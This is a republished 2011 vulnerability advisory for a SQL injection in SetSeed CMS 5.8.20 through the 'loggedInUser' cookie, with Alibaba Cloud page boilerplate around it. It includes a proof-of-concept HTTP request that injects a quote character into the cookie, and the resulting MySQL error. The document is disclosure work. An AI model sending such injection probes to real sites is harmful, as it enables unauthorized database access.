SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection defects and repair

Source: Internet
Author: User

 

SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability

Developer: SetSeed

Official: http://www.setseed.com

Affected Versions: 5.8.20

 

Summary: SetSeed is a self-hosted CMS which lets you rapidly build

And deploy complete websites and online stores for your clients.

 

Description: SetSeed CMS is vulnerable to SQL injection. A remote attacker

Cocould send specially-crafted SQL statements to the vulnerable script

Using the cookie input 'loginuser', which cocould allow the attacker

To view, add, modify or delete information in the back-end database.

 

 

Test Platform: Microsoft Windows XP Pro SP3 (EN)

Apache 2.2.21

MySQL 5.5.16

PHP 5.3.8

 

Discoverer: Gjoko 'liquidworm' Krstic www.2cto.com LiquidWorm gmail com

 

 

Advisory ID: ZSL-2011-5053

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5053.php

 

 

 

02.11.2011

 

---

 

 

GET/setseed-hub/HTTP/1.1

Cookie: loggedInKey = PYNS9QVWLEBG1E7C9UFCT674DYNW9YJ; loggedInUser = 1% 27; PHPSESSID = d6qiobigb5204mkuvculibhgd4

Host: localhost: 80

Connection: Keep-alive

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

 

 

HTTP/1.1 200 OK

Date: Wed, 02 Nov 2011 15:39:39 GMT

Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1

X-Powered-By: PHP/5.3.8

Content-Length: 150

Keep-Alive: timeout = 5, max = 62

Connection: Keep-Alive

Content-Type: text/html

 

 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for

Right syntax to use near ''1''' at line 1

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.